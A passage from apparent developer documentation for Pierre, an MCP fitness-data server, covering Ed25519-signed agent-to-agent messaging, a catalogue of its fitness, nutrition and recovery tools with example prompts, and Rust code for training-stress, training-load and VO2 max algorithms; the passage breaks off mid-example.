- Discoverability: Agents learn what Pierre can do without documentation
- JSON Schema: Input/output schemas enable automatic validation
- Examples: Sample usage helps agents understand tool behavior
- Authentication: Agents know how to authenticate (OAuth2, API keys)
Ed25519 Signatures
A2A uses Ed25519 for message authentication:
Ed25519 key generation (conceptual from src/a2a/client.rs:226):
#![allow(unused)]
fn main() {
// Generate Ed25519 keypair for the client
let signing_key = ed25519_dalek::SigningKey::generate(&mut OsRng);
let public_key = signing_key.verifying_key();
// Store public key in A2A client record
A2AClient {
public_key: base64::encode(public_key.to_bytes()),
key_type: "ed25519".into(),
// ... other fields
}
}
Why Ed25519:
- Fast: Much faster than RSA for both signing and verification
- Small keys: 32-byte public keys (vs 256+ bytes for RSA)
- Secure: 128-bit security level, resistant to timing attacks
- Deterministic: Same message always produces same signature (unlike ECDSA)
Signature verification (conceptual):
#![allow(unused)]
fn main() {
fn verify_signature(
    message: &[u8],
    signature: &[u8],
    public_key_base64: &str,
) -> Result<(), A2AError> {
    // Ed25519 public keys are exactly 32 bytes
    let public_key_bytes: [u8; 32] = base64::decode(public_key_base64)?
        .try_into()
        .map_err(|_| A2AError::AuthenticationFailed("Invalid public key length".into()))?;
    let public_key = VerifyingKey::from_bytes(&public_key_bytes)?;
    // Ed25519 signatures are exactly 64 bytes
    let signature_bytes: &[u8; 64] = signature
        .try_into()
        .map_err(|_| A2AError::AuthenticationFailed("Invalid signature length".into()))?;
    let signature = Signature::from_bytes(signature_bytes);
    public_key
        .verify(message, &signature)
        .map_err(|_| A2AError::AuthenticationFailed("Invalid signature".into()))
}
}
A2A Tasks
A2A supports long-running tasks with progress tracking:
Source: src/a2a/protocol.rs:229-250 (conceptual)
#![allow(unused)]
fn main() {
/// A2A Task structure for long-running operations
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct A2ATask {
/// Unique task identifier
pub id: String,
/// Current status of the task
pub status: TaskStatus,
/// When the task was created
pub created_at: chrono::DateTime<chrono::Utc>,
/// When the task completed (if finished)
#[serde(skip_serializing_if = "Option::is_none")]
pub completed_at: Option<chrono::DateTime<chrono::Utc>>,
/// Task result data (if completed successfully)
#[serde(skip_serializing_if = "Option::is_none")]
pub result: Option<Value>,
/// Error message (if failed)
#[serde(skip_serializing_if = "Option::is_none")]
pub error: Option<String>,
/// Client ID that created this task
pub client_id: String,
/// Type of task being performed
pub task_type: String,
}
}
Task lifecycle:
Created → Running → Completed
↘ Failed
↘ Cancelled
Task notifications: Server pushes progress updates via Server-Sent Events (SSE).
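The lifecycle above can be encoded as a small transition check. This is a sketch only: `can_transition` is a hypothetical helper, and it assumes terminal states (Completed, Failed, Cancelled) permit no further transitions, which the diagram does not state explicitly.

```rust
/// Task states from the lifecycle diagram.
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum TaskStatus {
    Created,
    Running,
    Completed,
    Failed,
    Cancelled,
}

/// Sketch of the transitions the diagram permits
/// (assumption: terminal states allow no further transitions).
pub fn can_transition(from: TaskStatus, to: TaskStatus) -> bool {
    use TaskStatus::{Cancelled, Completed, Created, Failed, Running};
    matches!(
        (from, to),
        (Created, Running) | (Running, Completed) | (Running, Failed) | (Running, Cancelled)
    )
}

fn main() {
    assert!(can_transition(TaskStatus::Created, TaskStatus::Running));
    assert!(can_transition(TaskStatus::Running, TaskStatus::Completed));
    assert!(!can_transition(TaskStatus::Completed, TaskStatus::Running));
}
```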
Key Takeaways
- JSON-RPC foundation: A2A reuses the same JSON-RPC infrastructure as MCP.
- Agent cards: Self-describing capabilities enable dynamic discovery without documentation.
- Ed25519 signatures: Fast, secure public-key authentication for agent messages.
- Structured messages: Support text, JSON data, and base64-encoded file attachments.
- Rate limiting: A2A clients have separate rate limits from regular API keys.
- API key prefix: A2A API keys use the a2a_ prefix to distinguish them from standard API keys.
- Protocol negotiation: Clients and servers negotiate supported capabilities during initialization.
- Long-running tasks: Async operations return task IDs with progress tracking.
- Error codes: A2A-specific error codes occupy the -32001 to -32010 range.
- Tool schemas: JSON Schema for input/output enables automatic validation and client generation.
- Multi-part messages: A single message can contain multiple content parts (text + data + files).
- Permission model: A2A clients have granular permissions (read_activities, write_goals, etc.).
End of Part V: OAuth, A2A & Providers
You’ve completed the OAuth and provider integration section. You now understand:
- OAuth 2.0 server implementation (Chapter 15)
- OAuth 2.0 client for fitness providers (Chapter 16)
- Provider data models and rate limiting (Chapter 17)
- A2A protocol for agent communication (Chapter 18)
Next Chapter: Chapter 19: Comprehensive Tools Guide - Begin Part VI by learning about all 47 MCP tools Pierre provides for fitness data analysis, how to use them with natural language prompts, and tool categorization.
Chapter 19: Comprehensive Tools Guide - All 47 MCP Tools
This chapter provides a complete reference to all 47 MCP tools Pierre offers for fitness data analysis. You’ll learn tool categories, natural language prompt examples, and how AI assistants discover and use these tools.
Tool Overview
Pierre provides 47 MCP tools organized in 8 functional categories:
┌────────────────────────────────────────────────────────────┐
│ Pierre MCP Tools (47 total) │
├────────────────────────────────────────────────────────────┤
│ 1. Core Fitness Tools (6) │
│ - Activities, athlete profiles, stats │
│ - Provider connection management │
├────────────────────────────────────────────────────────────┤
│ 2. Goals & Planning (4) │
│ - Goal setting, suggestions, feasibility │
│ - Progress tracking │
├────────────────────────────────────────────────────────────┤
│ 3. Performance Analysis (10) │
│ - Activity analysis, metrics calculation │
│ - Performance trends, pattern detection │
│ - Predictions, recommendations │
├────────────────────────────────────────────────────────────┤
│ 4. Configuration Management (6) │
│ - User profiles, training zones │
│ - System configuration catalog │
├────────────────────────────────────────────────────────────┤
│ 5. Fitness Configuration (4) │
│ - Fitness configuration CRUD │
│ - User-specific fitness settings │
├────────────────────────────────────────────────────────────┤
│ 6. Sleep & Recovery (5) │
│ - Sleep quality analysis │
│ - Recovery score calculation │
│ - Rest day suggestions │
├────────────────────────────────────────────────────────────┤
│ 7. Nutrition Tools (5) │
│ - Daily nutrition calculations │
│ - USDA food database search │
│ - Meal analysis │
├────────────────────────────────────────────────────────────┤
│ 8. Recipe Management (7) │
│ - Training-aware meal planning │
│ - Recipe storage and search │
└────────────────────────────────────────────────────────────┘
Tool registry: See src/mcp/schema.rs for the complete tool registration.
For detailed documentation of all 47 tools, see tools-reference.md.
1. Core Fitness Tools (6 Tools)
These tools retrieve fitness data and manage provider connections.
connect_provider
Description: Connect to a fitness provider (Strava, Fitbit) via unified OAuth flow.
Parameters:
{
"provider": "strava" // Required: "strava" or "fitbit"
}
Natural language prompts:
- “Connect to Strava to get my activities”
- “I want to sync my Fitbit data”
- “Link my Garmin account”
Use case: Initial provider connection or adding additional providers.
get_connection_status
Description: Check which fitness providers are currently connected.
Parameters: Optional OAuth credentials for custom apps
Natural language prompts:
- “Which providers am I connected to?”
- “Show my connection status”
- “Am I still connected to Strava?”
Use case: Verify active connections before requesting data.
disconnect_provider
Description: Revoke access tokens for a specific fitness provider.
Parameters:
{
"provider": "strava" // Required
}
Natural language prompts:
- “Disconnect from Strava”
- “Remove my Fitbit connection”
- “Revoke Pierre’s access to my Garmin data”
Use case: Privacy management, switching accounts, troubleshooting.
2. Data Access Tools (4 Tools)
These tools fetch raw data from connected fitness providers.
get_activities
Description: Retrieve fitness activities from a provider.
Parameters:
{
"provider": "strava", // Required
"limit": 10, // Optional: max activities (default: 10)
"offset": 0 // Optional: pagination offset
}
Natural language prompts:
- “Show me my last 20 Strava runs”
- “Get my recent Fitbit activities”
- “Fetch all my workouts from this month”
Use case: Activity listing, data exploration, trend analysis preparation.
get_athlete
Description: Get athlete profile from a provider.
Parameters:
{
"provider": "strava" // Required
}
Natural language prompts:
- “Show my Strava profile”
- “What’s my FTP according to Strava?”
- “Get my athlete stats”
Use case: Profile information, baseline metrics (FTP, max HR, weight).
get_stats
Description: Get aggregate statistics from a provider.
Parameters:
{
"provider": "strava" // Required
}
Natural language prompts:
- “Show my year-to-date running totals”
- “What are my all-time cycling stats?”
- “How much have I run this month?”
Use case: Summary statistics, progress tracking, milestone identification.
get_activity_intelligence
Description: AI-powered insights and analysis for a specific activity.
Parameters:
{
"activity_id": "12345678", // Required
"provider": "strava", // Required
"include_location": true, // Optional: location intelligence
"include_weather": true // Optional: weather analysis
}
Natural language prompts:
- “Analyze my last run with weather and location insights”
- “What can you tell me about activity 12345678?”
- “Give me intelligent insights on my latest ride”
Use case: Deep activity analysis, performance insights, environmental factors.
Note: OAuth notifications are delivered via Server-Sent Events (SSE) and WebSocket connections rather than as MCP tools. See Chapter 11 (Transport Layers) for details on real-time notification delivery.
3. Intelligence & Analytics Tools (13 Tools)
These tools provide AI-powered analysis and insights.
analyze_activity
Description: Comprehensive analysis of a single activity.
Natural language prompts:
- “Analyze my activity from yesterday”
- “What insights can you give me about my last ride?”
- “Deep dive into my marathon performance”
Use case: Post-workout analysis, identifying strengths/weaknesses.
calculate_metrics
Description: Calculate derived metrics from activity data.
Natural language prompts:
- “Calculate my TSS for last week”
- “What’s my Normalized Power for this ride?”
- “Compute training load metrics”
Use case: Advanced metrics not provided by fitness providers.
analyze_performance_trends
Description: Identify performance trends over time.
Natural language prompts:
- “Am I getting faster at running?”
- “Show my cycling power trends over the last 3 months”
- “Is my fitness improving?”
Use case: Long-term progress tracking, plateau detection.
compare_activities
Description: Compare two or more activities.
Natural language prompts:
- “Compare my last two 5K runs”
- “How does today’s ride compare to last week?”
- “Show differences between these activities”
Use case: Performance comparison, identifying improvements/regressions.
detect_patterns
Description: Detect patterns in training data.
Natural language prompts:
- “Find patterns in my running data”
- “Do I always run faster in the morning?”
- “What training patterns lead to my best performances?”
Use case: Optimization insights, habit identification.
set_goal
Description: Set a fitness goal with target metrics.
Natural language prompts:
- “Set a goal to run a sub-20 minute 5K by June”
- “I want to cycle 200km per week”
- “Target: Complete a marathon in under 4 hours”
Use case: Goal management, motivation tracking.
track_progress
Description: Track progress towards goals.
Natural language prompts:
- “How am I progressing towards my marathon goal?”
- “Show progress on my weekly cycling target”
- “Am I on track to hit my 5K goal?”
Use case: Goal monitoring, progress visualization.
suggest_goals
Description: AI-suggested goals based on current fitness level.
Natural language prompts:
- “What goals should I set?”
- “Suggest realistic running goals for me”
- “What’s achievable in the next 3 months?”
Use case: Goal discovery, personalized recommendations.
analyze_goal_feasibility
Description: Analyze if a goal is realistic given current fitness.
Natural language prompts:
- “Can I realistically run a sub-3 hour marathon?”
- “Is a 100-mile week feasible for me?”
- “Evaluate my goal to bike 50km in under 2 hours”
Use case: Goal validation, expectation management.
generate_recommendations
Description: Generate training recommendations.
Natural language prompts:
- “What should I work on to improve my cycling?”
- “Give me recommendations for faster 10K times”
- “How can I improve my marathon performance?”
Use case: Training advice, weakness identification.
calculate_fitness_score
Description: Calculate current fitness score.
Natural language prompts:
- “What’s my current fitness score?”
- “Calculate my fitness level”
- “How fit am I right now?”
Use case: Fitness tracking, periodization planning.
predict_performance
Description: Predict performance for upcoming events.
Natural language prompts:
- “Predict my marathon time”
- “What pace can I sustain for a half marathon?”
- “Estimate my 5K time based on current fitness”
Use case: Race planning, pacing strategy.
analyze_training_load
Description: Analyze training stress and recovery needs.
Natural language prompts:
- “Am I overtraining?”
- “What’s my current training load?”
- “Do I need a rest day?”
Use case: Recovery planning, injury prevention.
4. Configuration Management Tools (10 Tools)
These tools manage user profiles and training zones.
get_configuration_catalog
Description: List all available configuration algorithms and profiles.
Natural language prompts:
- “What configuration profiles are available?”
- “Show me all training zone calculation methods”
Use case: Discovering configuration options.
get_user_configuration
Description: Retrieve user’s current configuration.
Natural language prompts:
- “Show my current training zones”
- “What’s my configuration?”
Use case: Viewing active settings.
update_user_configuration
Description: Update user profile (age, weight, FTP, max HR, etc.).
Natural language prompts:
- “Update my FTP to 250 watts”
- “Set my max heart rate to 185”
- “Change my weight to 70kg”
Use case: Profile updates after fitness tests.
calculate_personalized_zones
Description: Calculate personalized training zones.
Natural language prompts:
- “Calculate my heart rate zones”
- “What are my power zones?”
- “Determine my pace zones”
Use case: Training zone setup.
5. Nutrition Tools (5 Tools)
These tools provide nutrition analysis and planning.
calculate_daily_nutrition
Description: Calculate daily nutrition needs.
Natural language prompts:
- “How many calories should I eat?”
- “Calculate my daily protein needs”
- “What are my macros?”
Use case: Nutrition planning based on training load.
search_food
Description: Search USDA food database.
Natural language prompts:
- “Search for ‘banana’ in the food database”
- “Find nutrition info for oatmeal”
Use case: Food logging, meal planning.
get_food_details
Description: Get detailed nutrition info for a food.
Natural language prompts:
- “Show details for food ID 123456”
- “What nutrients are in this food?”
Use case: Detailed nutrition analysis.
analyze_meal_nutrition
Description: Analyze complete meal nutrition.
Natural language prompts:
- “Analyze this meal: 100g chicken, 200g rice, 50g broccoli”
- “What’s the nutritional breakdown of my lunch?”
Use case: Meal logging, nutrition tracking.
6. Sleep & Recovery Tools (5 Tools)
These tools analyze sleep and recovery metrics.
analyze_sleep_quality
Description: Analyze sleep quality and duration.
Natural language prompts:
- “How was my sleep last night?”
- “Analyze my sleep quality”
Use case: Recovery monitoring.
calculate_recovery_score
Description: Calculate recovery score based on multiple factors.
Natural language prompts:
- “What’s my recovery score?”
- “Am I recovered enough to train hard?”
Use case: Training intensity planning.
suggest_rest_day
Description: Suggest if a rest day is needed.
Natural language prompts:
- “Do I need a rest day?”
- “Should I take it easy today?”
Use case: Injury prevention, overtraining avoidance.
Tool Chaining Patterns
AI assistants often chain multiple tools together:
Pattern 1: Connect → Fetch → Analyze
User: "Analyze my recent running performance"
AI chains:
1. get_connection_status() // Check if connected
2. get_activities(provider="strava", limit=20) // Fetch runs
3. analyze_performance_trends() // Analyze trends
4. generate_recommendations() // Suggest improvements
Pattern 2: Configuration → Calculation → Recommendation
User: "What should my training zones be?"
AI chains:
1. get_user_configuration() // Get FTP, max HR
2. calculate_personalized_zones() // Calculate zones
3. generate_recommendations() // Training advice for each zone
Pattern 3: Goal Setting → Tracking → Prediction
User: "Set a goal and track my progress"
AI chains:
1. suggest_goals() // Suggest realistic goal
2. set_goal() // Create goal
3. track_progress() // Monitor progress
4. predict_performance() // Estimate completion
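At the wire level, each step in a chain is an ordinary MCP tools/call request. A hypothetical request for step 2 of Pattern 1 might look like this (the id and argument values are illustrative):

```json
{
  "jsonrpc": "2.0",
  "id": 42,
  "method": "tools/call",
  "params": {
    "name": "get_activities",
    "arguments": {
      "provider": "strava",
      "limit": 20
    }
  }
}
```

The AI assistant issues one such request per step, feeding each tool's result into its reasoning before choosing the next call.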
Key Takeaways
- 47 total tools: Organized in 8 functional categories for comprehensive fitness analysis.
- Natural language: AI assistants translate user prompts to tool calls automatically.
- Tool discovery: tools/list provides all tool schemas for AI assistants.
- Connection-first: Most workflows start with connection tools to establish OAuth.
- Intelligence layer: 10 analytics tools provide AI-powered insights beyond raw data.
- Configuration-driven: Personalized zones and recommendations based on user profile.
- Nutrition integration: USDA food database + meal analysis for holistic health.
- Recovery focus: Sleep and recovery tools prevent overtraining.
- Recipe management: Training-aware meal planning and recipe storage.
- Tool chaining: Complex workflows combine multiple tools sequentially.
- JSON Schema: Every tool has an input schema for validation and type safety.
See tools-reference.md for complete tool documentation.
Next Chapter: Chapter 20: Sports Science Algorithms & Intelligence - Learn how Pierre implements sports science algorithms for TSS, CTL/ATL/TSB, VO2 max estimation, FTP detection, and performance predictions.
Chapter 20: Sports Science Algorithms & Intelligence
This chapter explores how Pierre implements sports science algorithms for training load management, fitness tracking, and performance estimation. You’ll learn about TSS calculation, CTL/ATL/TSB (Performance Manager Chart), VO2 max estimation, FTP detection, and algorithm configuration patterns.
Algorithm Configuration Pattern
Pierre uses enums to select between multiple algorithm implementations:
User selects algorithm → Enum variant → Implementation strategy → Result
Pattern benefits:
- Flexibility: Easy to add new algorithms
- Testability: Compare algorithm outputs for validation
- User choice: Power users can optimize for their data/use case
- Backwards compatibility: Default impl when new algorithms added
Training Stress Score (TSS)
TSS quantifies training load from a single workout.
Source: src/intelligence/algorithms/tss.rs:10-52
/// TSS calculation algorithm selection
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
#[derive(Default)]
pub enum TssAlgorithm {
    /// Average power based TSS (current default)
    ///
    /// Formula: `duration_hours x (avg_power/FTP)² x 100`
    ///
    /// Pros: O(1) computation, works without power stream
    /// Cons: Underestimates variable efforts by 15-30%
    #[default]
    AvgPower,
    /// Normalized Power based TSS (industry standard)
    ///
    /// Formula: `duration_hours x (NP/FTP)² x 100`
    ///
    /// `NP = ⁴√(mean(mean_per_30s_window(power⁴)))`
    ///
    /// Pros: Physiologically accurate (R²=0.92 vs glycogen depletion)
    /// Cons: Requires ≥30s power stream data
    NormalizedPower {
        /// Rolling window size in seconds (standard: 30)
        window_seconds: u32,
    },
    /// Hybrid approach: Try NP, fallback to `avg_power` if stream unavailable
    ///
    /// Best of both worlds for defensive programming
    Hybrid,
}
TSS interpretation:
- < 150: Easy recovery ride/run
- 150-300: Moderate workout
- 300-450: Hard training session
- > 450: Very hard/race effort
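To make the average-power formula concrete, here is a simplified standalone sketch of the arithmetic (the real `calculate_avg_power_tss` shown below operates on an `Activity` and returns a `Result`; the bare `100.0` stands in for `TSS_BASE_MULTIPLIER`):

```rust
/// Simplified average-power TSS: duration_hours * (avg_power / ftp)^2 * 100.
/// Standalone sketch; Pierre's implementation works on an `Activity` struct.
fn avg_power_tss(avg_power: f64, ftp: f64, duration_hours: f64) -> f64 {
    let intensity_factor = avg_power / ftp;
    (duration_hours * intensity_factor * intensity_factor * 100.0).round()
}
```

A 2-hour ride at 200 W average with an FTP of 250 W scores 2 × 0.8² × 100 = 128 TSS, an easy-to-moderate effort on the scale above.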
Average Power TSS (simple):
Source: src/intelligence/algorithms/tss.rs:111-124
fn calculate_avg_power_tss(
    activity: &Activity,
    ftp: f64,
    duration_hours: f64,
) -> Result<f64, AppError> {
    let avg_power = f64::from(
        activity
            .average_power
            .ok_or_else(|| AppError::not_found("average power data".to_owned()))?,
    );
    let intensity_factor = avg_power / ftp;
    Ok((duration_hours * intensity_factor * intensity_factor * TSS_BASE_MULTIPLIER).round())
}
Normalized Power TSS (accurate):
Source: src/intelligence/algorithms/tss.rs:129-139
fn calculate_np_tss(
    activity: &Activity,
    ftp: f64,
    duration_hours: f64,
    window_seconds: u32,
) -> Result<f64, AppError> {
    // Calculate TSS using normalized power from activity power stream data
    let np = Self::calculate_normalized_power(activity, window_seconds)?;
    let intensity_factor = np / ftp;
    Ok((duration_hours * intensity_factor * intensity_factor * TSS_BASE_MULTIPLIER).round())
}
Normalized Power formula:
NP = ⁴√(mean(mean_per_30s_window(power⁴)))
Why 4th power: Matches physiological stress curve (glycogen depletion, lactate accumulation).
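The formula can be sketched directly from its definition. This simplified version assumes a 1 Hz power stream and ignores the gap handling and validation the real `calculate_normalized_power` would need:

```rust
/// Normalized Power sketch: 4th root of the mean of (rolling-window average power)^4.
/// Assumes 1 Hz samples; `window` is the rolling window length (standard: 30).
fn normalized_power(power_1hz: &[f64], window: usize) -> Option<f64> {
    if window == 0 || power_1hz.len() < window {
        return None;
    }
    // Each rolling-window mean, raised to the 4th power.
    let fourths: Vec<f64> = power_1hz
        .windows(window)
        .map(|w| {
            let mean = w.iter().sum::<f64>() / window as f64;
            mean.powi(4)
        })
        .collect();
    let mean_fourth = fourths.iter().sum::<f64>() / fourths.len() as f64;
    Some(mean_fourth.powf(0.25))
}
```

For a perfectly steady effort NP equals average power; for a variable effort (surges and recoveries) the 4th power weights the surges heavily, so NP comes out above the average.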
CTL/ATL/TSB (Performance Manager Chart)
CTL/ATL/TSB track fitness, fatigue, and form over time.
Definitions:
- CTL (Chronic Training Load): 42-day exponential moving average of TSS (fitness)
- ATL (Acute Training Load): 7-day exponential moving average of TSS (fatigue)
- TSB (Training Stress Balance): CTL - ATL (form/freshness)
Source: src/intelligence/algorithms/training_load.rs:8-85
/// Training load calculation algorithm selection
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
#[serde(rename_all = "snake_case")]
pub enum TrainingLoadAlgorithm {
    /// Exponential Moving Average (EMA)
    ///
    /// Formula: `α = 2/(N+1)`, `EMA_t = α x TSS_t + (1-α) x EMA_{t-1}`
    ///
    /// Standard method used by TrainingPeaks Performance Manager Chart.
    /// Recent days weighted more heavily with exponential decay.
    Ema {
        /// CTL window in days (default 42 for fitness)
        ctl_days: i64,
        /// ATL window in days (default 7 for fatigue)
        atl_days: i64,
    },
    /// Simple Moving Average (SMA)
    ///
    /// Formula: `SMA = Σ(TSS_i) / N` for i in [t-N+1, t]
    ///
    /// All days in window weighted equally.
    Sma {
        ctl_days: i64,
        atl_days: i64,
    },
    /// Weighted Moving Average (WMA)
    ///
    /// Formula: `WMA = Σ(w_i x TSS_i) / Σ(w_i)` where `w_i = i` (linear weights)
    ///
    /// Recent days weighted linearly more than older days.
    Wma {
        ctl_days: i64,
        atl_days: i64,
    },
    /// Kalman Filter
    ///
    /// State-space model with process and measurement noise.
    /// Optimal estimation when data is noisy or has gaps.
    KalmanFilter {
        /// Process noise (training load variability)
        process_noise: f64,
        /// Measurement noise (TSS measurement error)
        measurement_noise: f64,
    },
}
EMA calculation:
Source: src/intelligence/algorithms/training_load.rs:122-136
pub fn calculate_ctl(&self, tss_data: &[TssDataPoint]) -> Result<f64, AppError> {
    if tss_data.is_empty() {
        return Ok(0.0);
    }
    match self {
        Self::Ema { ctl_days, .. } => Self::calculate_ema(tss_data, *ctl_days),
        Self::Sma { ctl_days, .. } => Self::calculate_sma(tss_data, *ctl_days),
        Self::Wma { ctl_days, .. } => Self::calculate_wma(tss_data, *ctl_days),
        Self::KalmanFilter {
            process_noise,
            measurement_noise,
        } => Self::calculate_kalman(tss_data, *process_noise, *measurement_noise),
    }
}
TSB interpretation:
- TSB > +25: Well-rested, ready for peak performance
- TSB +10 to +25: Fresh, good for races
- TSB -10 to +10: Balanced, sustainable training
- TSB -10 to -30: Fatigued, productive overload
- TSB < -30: High risk of overtraining
EMA formula:
α = 2 / (N + 1)
CTL_today = α × TSS_today + (1 - α) × CTL_yesterday
For CTL (N=42): α = 2/43 ≈ 0.0465 (slow adaptation)
For ATL (N=7): α = 2/8 = 0.25 (fast response)
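Iterating that recurrence over a daily TSS series gives the current CTL or ATL. A minimal sketch, assuming exactly one TSS value per day and a zero starting value (the real code runs over `TssDataPoint` records with dates):

```rust
/// Apply the EMA recurrence day by day: alpha = 2 / (N + 1),
/// ema_today = alpha * tss_today + (1 - alpha) * ema_yesterday.
fn ema_series(daily_tss: &[f64], window_days: f64) -> f64 {
    let alpha = 2.0 / (window_days + 1.0);
    daily_tss
        .iter()
        .fold(0.0, |ema, &tss| alpha * tss + (1.0 - alpha) * ema)
}
```

Training at a constant 100 TSS/day, ATL (N=7, α=0.25) converges to 100 within a few weeks, while CTL (N=42, α≈0.0465) takes months — which is exactly why CTL models fitness and ATL models fatigue.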
VO2 Max Estimation
VO2 max represents maximal aerobic capacity (ml/kg/min).
Source: src/intelligence/algorithms/vo2max.rs:18-100
/// VO2max estimation algorithm selection
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
#[serde(rename_all = "snake_case")]
pub enum Vo2maxAlgorithm {
    /// From Jack Daniels' VDOT
    ///
    /// Formula: `VO2max = VDOT x 3.5`
    ///
    /// VDOT is Jack Daniels' running economy-adjusted VO2max measure.
    FromVdot {
        /// VDOT value (30-85 for recreational to elite)
        vdot: f64,
    },
    /// Cooper 12-Minute Run Test
    ///
    /// Formula: `VO2max = (distance_meters - 504.9) / 44.73`
    ///
    /// Run as far as possible in 12 minutes on a flat track.
    CooperTest {
        /// Distance covered in 12 minutes (meters)
        distance_meters: f64,
    },
    /// Rockport 1-Mile Walk Test
    ///
    /// Formula: `VO2max = 132.853 - 0.0769×weight - 0.3877×age + 6.315×gender - 3.2649×time - 0.1565×HR`
    ///
    /// Walk 1 mile as fast as possible, measure time and heart rate at finish.
    /// Gender: 0 = female, 1 = male
    RockportWalk {
        weight_kg: f64,
        age: u8,
        gender: u8,
        time_seconds: f64,
        heart_rate: f64,
    },
    /// Åstrand-Ryhming Cycle Ergometer Test
    ///
    /// Submaximal cycle test at steady-state heart rate (120-170 bpm).
    AstrandRyhming {
        gender: u8,
        heart_rate: f64,
        power_watts: f64,
    },
    /// Speed-based VO2max estimation from race performance
    ///
    /// Formula: `VO2max = 15.3 × (MaxSpeed / RecoverySpeed)`
    ///
    /// Uses maximum sustainable speed vs recovery speed ratio.
    FromPace {
        /// Maximum speed in m/s during test
        max_speed_ms: f64,
        /// Recovery speed in m/s
        recovery_speed_ms: f64,
    },
    /// Hybrid: Auto-select best method based on available data
    ///
    /// Attempts to use the most appropriate algorithm given available
    /// test parameters. Returns error if insufficient data provided.
    Hybrid,
}
VO2 max ranges (ml/kg/min):
- Untrained: 30-40 (recreational)
- Trained: 40-50 (club runner)
- Well-trained: 50-60 (competitive)
- Elite: 60-70 (national level)
- World-class: 70-85 (Olympic/professional)
Cooper Test example:
Distance: 3000 meters in 12 minutes
VO2max = (3000 - 504.9) / 44.73 ≈ 55.8 ml/kg/min (well-trained)
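The Cooper formula is a one-liner, which makes it a good sanity check for the enum's `CooperTest` variant. A standalone sketch:

```rust
/// Cooper 12-minute run test: VO2max (ml/kg/min) = (distance_meters - 504.9) / 44.73.
fn cooper_vo2max(distance_meters: f64) -> f64 {
    (distance_meters - 504.9) / 44.73
}
```

Plugging in the 3000 m example above yields ≈ 55.8 ml/kg/min, in the well-trained band of the ranges listed.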
Algorithm Selection Pattern
All algorithms follow the same pattern:
enum Algorithm {
    Method1 { params },
    Method2 { params },
    Method3,
}

impl Algorithm {
    fn calculate(&self, data: &Data) -> Result<f64> {
        match self {
            Self::Method1 { params } => /* implementation */,
            Self::Method2 { params } => /* implementation */,
            Self::Method3 => /* implementation */,
        }
    }
}
Benefits:
- Type safety: Compiler ensures all enum variants handled
- Documentation: Variant doc comments explain algorithms
- Flexibility: Easy to add new algorithms
- Configuration: Serialize/deserialize for user preferences
- Testing: Compare algorithms for validation
Scientific Validation
Pierre includes scientific references for algorithms:
TSS references:
- Coggan, A. & Allen, H. (2010). “Training and Racing with a Power Meter.” VeloPress.
- Sanders, D. & Heijboer, M. (2018). “The anaerobic power reserve.” J Sports Sci, 36(6), 621-629.
CTL/ATL/TSB references:
- Coggan, A. (2003). “Training and Racing Using a Power Meter.” Peaksware LLC.
- Banister, E.W. (1991). “Modeling elite athletic performance.” Physiological Testing of Elite Athletes.
VO2 max references:
- Daniels, J. (2013). “Daniels’ Running Formula” (3rd ed.). Human Kinetics.
- Cooper, K.H. (1968). “A means of assessing maximal oxygen intake.” JAMA, 203(3), 201-204.
Validation approach:
- Literature-based: All formulas from peer-reviewed research
- Industry standards: TrainingPeaks, Strava algorithms as benchmarks
- Correlation studies: Verify against physiological measurements
Key Takeaways
- Enum-based selection: All algorithms use enum pattern for flexibility and type safety.
- TSS calculation: Average power (fast, less accurate) vs Normalized Power (slower, more accurate).
- CTL/ATL/TSB: 42-day fitness, 7-day fatigue, balance indicates form/readiness.
- EMA standard: Exponential moving average matches TrainingPeaks industry standard.
- VO2 max estimation: Multiple test protocols (Cooper, Rockport, Åstrand-Ryhming).
- Scientific references: All algorithms cite peer-reviewed research for validation.
- Multiple strategies: Users can choose algorithms based on data availability and preferences.
- Hybrid fallback: Defensive programming with primary + fallback implementations.
- Documentation in code: Variant doc comments explain formulas, pros/cons, scientific basis.
- Serde support: All algorithms serialize/deserialize for configuration persistence.
Detailed Methodology Reference
For comprehensive technical documentation of all sports science algorithms, see the Intelligence Methodology Document in the Pierre source repository:
docs/intelligence-methodology.md
This reference document, spanning 100+ sections, covers:
| Topic | Description |
|---|---|
| Architecture Overview | Foundation modules, core modules, 47 intelligence tools |
| Data Sources | Primary data, user profiles, provider normalization |
| Personalization Engine | Age-based MaxHR, HR zones, power zones |
| Core Metrics | Pace/speed conversion, TSS variants, Normalized Power |
| Training Load | CTL/ATL/TSB mathematical formulation with EMA |
| Overtraining Detection | Risk indicators and warning thresholds |
| VDOT Performance | Daniels tables, race prediction, accuracy verification |
| Pattern Recognition | Weekly schedules, hard/easy alternation, volume progression |
| Sleep & Recovery | Sleep quality scoring, recovery score calculation |
| Validation & Safety | Parameter bounds, confidence levels, edge cases |
| Configuration Strategies | Conservative, default, aggressive profiles |
| Debugging Guide | Metric-specific troubleshooting, platform issues |
For implementers: The methodology document includes complete formulas, code examples, and scientific references for every algorithm in the Pierre intelligence engine.
Next Chapter: Chapter 21: Training Load, Recovery & Sleep Analysis - Learn how Pierre analyzes recovery metrics, sleep quality, HRV, and suggests optimal training intensity based on recovery status.
Chapter 21: Training Load, Recovery & Sleep Analysis
This chapter covers how Pierre analyzes recovery metrics, sleep quality, training load management, and provides rest day suggestions. You’ll learn about recovery score calculation, sleep stage analysis, HRV interpretation, and overtraining detection.
Cross-Provider Support
Pierre supports fetching activity data and sleep/recovery data from different providers. This enables scenarios where you use specialized devices for different purposes:
Example Configurations:
- Strava + WHOOP: Track runs with Strava’s GPS accuracy, get recovery metrics from WHOOP’s HRV monitoring
- Garmin + Fitbit: Running metrics from Garmin, lifestyle/sleep tracking from Fitbit
- Any combination: Mix and match based on your device ecosystem
How It Works:
When calling sleep/recovery tools, you can specify separate providers:
{
  "activity_provider": "strava",
  "sleep_provider": "whoop"
}
Auto-Selection Priority:
- Activity providers: strava > garmin > fitbit > whoop > terra
- Sleep providers: whoop > garmin > fitbit > terra
The system automatically selects the best connected provider if not specified, prioritizing providers known for their specialty (e.g., WHOOP for recovery, Strava for activities).
Response Metadata:
All cross-provider responses include information about which providers were used:
{
  "recovery_score": { ... },
  "providers_used": {
    "activity_provider": "strava",
    "sleep_provider": "whoop"
  }
}
Intelligence Tools with Cross-Provider Support
The following intelligence tools also support cross-provider analysis via the sleep_provider parameter:
calculate_fitness_score: When sleep_provider is specified, recovery quality factors into the fitness score:
{
